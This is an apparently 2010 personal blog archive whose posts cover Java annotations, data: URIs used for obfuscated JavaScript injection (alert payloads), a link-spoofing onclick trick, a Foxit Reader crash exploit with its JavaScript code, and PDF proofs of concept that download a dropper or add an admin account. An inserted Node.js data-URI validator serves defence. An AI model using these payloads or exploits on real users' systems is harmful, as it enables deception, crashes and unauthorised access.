Monday, November 1, 2010

Java Annotations pt 2

This is my second entry about this topic. This one is a simple example of how to implement a singleton pattern without having to code it: just annotate the class.

Let's make our annotation.



Just for test, we will create a simple class.



And now the brains!



Our main class goes like this.



Let's test this!

Output:
test
21171036
test
21171036

Boom!

Sunday, October 31, 2010

Java Annotations

One of the coolest things that Java permits is adding annotations to classes and methods.
This feature can be extremely useful, for example to build your own unit tests or something else.

The interface is where you define your annotation.



And in your class.



Output

Annotation class Main
name: Something
Version: This is a annotation

Uri Scheme

In this post I will cover one of the coolest features that modern browsers support nowadays, which is URI schemes. There are a lot of schemes out there: browser custom schemes (about:something), protocol schemes (mailto:something@something.com?subject=Hello&body=Hello), and of course data schemes.

In this post I will only talk about data schemes.

Data schemes are organized like this:

data:{type of the data};{encode},{data}

In the type of data you can use various types, such as:
text/html
application/javascript (text/javascript was deprecated)
image/png
etc.

These types are defined as internet media types.

It's time to make some magic.
Put this in your browser:
data:image/gif;base64,R0lGODlhLQAwAPAAAAAAAFVVVSH5BAAHAAAALAAAAAAtADAAAAJxTGB4yesKW3y0ziszxVbzb3hiR2JgOYLnmmotCpsvG9c2Pec1zbf9PdL9VMLixjhsIJeLJPD4dCqY0ijVip1ml1Vr13n1hntf47hYBqZ/Z3Wbtda9c/HdHHaH50V13Fb8R7ZHMkgUSFfocui2qNf4UgAAOw==



You should see an image now!
OK, this is the thing: the simple fact is that you can store the data in the web page itself.

Now, the question is how can we make this feature useful for us?! JavaScript/HTML injections!

So let's test something, put this in your browser:

data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%55%52%49%20%73%63%68%65%6D%65%73%21%22%29%3C%2F%73%63%72%69%70%74%3E


Boom!

Now let's make this even more fun! Let's encode the JavaScript to make this less perceptible.

JavaScript encoded + base64
data:text/html;base64,PHNjcmlwdD52YXIgXzB4NGMxOT1bIlx4NTVceDcyXHg2OVx4MjBceDUzXHg2M1x4NjhceDY1XHg2RFx4NjVceDczXHgyMFx4MkZceDIwXHg0NVx4NkVceDYzXHg2Rlx4NjRceDY1XHg2NCJdO2Z1bmN0aW9uIE1zZ0JveChfMHg4OTExeDIpe2FsZXJ0KF8weDg5MTF4Mik7fSA7TXNnQm94KF8weDRjMTlbMF0pOzwvc2NyaXB0Pg==

Works!
This can be done with all available content types, so be creative.

Hope you have learned something!

These sites could be useful for further research:

Base64 online encoder - http://www.motobit.com/util/base64-decoder-encoder.asp
XSS - http://ha.ckers.org/xss.html
Internet media types - http://en.wikipedia.org/wiki/Internet_media_type
Data URI Scheme - http://en.wikipedia.org/wiki/Data:_URI_scheme
URI Scheme - http://en.wikipedia.org/wiki/URI_scheme
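The data:{type of the data};{encode},{data} layout described above, parsed and checked against an allowlist before a user-supplied link is rendered. This is an added example for Node.js, not code from the original post; the function and constant names are chosen here, and every sample except the first (the percent-encoded URI from the post) is constructed.

```javascript
// Added example (Node.js). Function and constant names are chosen for this example.
const ACTIVE_TYPES = new Set([
  "text/html", "application/xhtml+xml", "image/svg+xml", "text/xml",
  "application/xml", "text/javascript", "application/javascript",
]);
const SAFE_IMAGE_TYPES = new Set(["image/png", "image/gif", "image/jpeg"]);

// Parse data:{type};{encoding},{data}. Returns null when the input is not a data: URI.
function inspectDataUri(uri) {
  // Browsers drop tab/CR/LF inside URLs and ignore leading spaces and scheme case.
  const cleaned = uri.replace(/[\t\r\n]/g, "").trim();
  if (!/^data:/i.test(cleaned)) return null;
  const comma = cleaned.indexOf(",");
  if (comma === -1) return { valid: false, active: true }; // malformed: fail closed
  const params = cleaned.slice(5, comma).split(";").map((p) => p.trim().toLowerCase());
  const mediaType = params[0] || "text/plain"; // RFC 2397 default when omitted
  const isBase64 = params.length > 1 && params[params.length - 1] === "base64";
  let text;
  try {
    const unescaped = decodeURIComponent(cleaned.slice(comma + 1));
    text = isBase64 ? Buffer.from(unescaped, "base64").toString("latin1") : unescaped;
  } catch (err) {
    return { valid: false, mediaType, isBase64, active: true }; // bad %-escape
  }
  // Heuristic only: markup in the payload is suspicious whatever the declared type.
  const scriptLike = /<\s*script\b|javascript:/i.test(text);
  return { valid: true, mediaType, isBase64, text,
           active: ACTIVE_TYPES.has(mediaType) || scriptLike };
}

// Allowlist policy for user-supplied links: only inert image types pass.
function isAllowedDataUri(uri) {
  const info = inspectDataUri(uri);
  return info !== null && info.valid && !info.active &&
         SAFE_IMAGE_TYPES.has(info.mediaType);
}

// First sample is the percent-encoded URI from the post; the others are constructed.
const SAMPLES = [
  "data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%55%52%49%20%73%63%68%65%6D%65%73%21%22%29%3C%2F%73%63%72%69%70%74%3E",
  " DATA:Text/HTML;base64,PGI+aGk8L2I+", // mixed case, leading space
  "data:image/gif;base64,R0lGODlh",      // just the GIF89a signature
  "data:text/html",                      // no comma: malformed
];
for (const s of SAMPLES) {
  const info = inspectDataUri(s);
  console.log(isAllowedDataUri(s), info.mediaType, info.active, JSON.stringify(info.text));
}
```

The decoded text is what a reviewer or a log line should show, since the encoded form hides the markup from a plain string match.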

Link Spoof

This is just a little trick to redirect a link.

<a href="http://google.com" onclick="this.href='http://yahoo.com'">Spoof link should go to google</a>

Normally this link would lead us to google.com, but this is not a normal link: it will redirect you to yahoo.com, because the onclick handler rewrites this.href before the browser follows the link. This is the "this" magic.

Works on IE, Firefox, Chrome, Opera.

Hope you have learned something!

Monday, April 12, 2010

Pdf Download & Execute

The PoC consists of downloading a file located in the repo at http://iamjuza.googlecode.com/files/dropper.txt and executing it.


Pdf Download & Execute from iamjuza on Vimeo.


Pdf Download & Execute 2 from iamjuza on Vimeo.

How to Java Threads

This paper talks about how to do threads in Java (the basics, sharing objects between threads, thread collaboration).



Download!

Tuesday, April 6, 2010

Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit

OK, this is my new exploit. I found this one while playing with JavaScript, just take a look!

http://www.exploit-db.com/exploits/12080

--------------------------------------------------------------
Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}

DoS("DoS");


-------------------------

PoC: http://www.exploit-db.com/sploits/12080.pdf

Wednesday, March 31, 2010

Adobe Reader 7-8 File Execution No Javascript

This is a vuln found by Didier Stevens (hxxp://blog.didierstevens.com/2010/03/29/escape-from-pdf/). Since his PoC isn't finished yet, this is one of my own: the PDF adds an admin user account to the system (username: x; password: x).


Tested in Adobe Reader 9.3

Download POC here!

Enjoy it!

Check it out!

Adobe Reader File Execution - Add User POC from iamjuza on Vimeo.


There are more PoCs in the forge, stay tuned!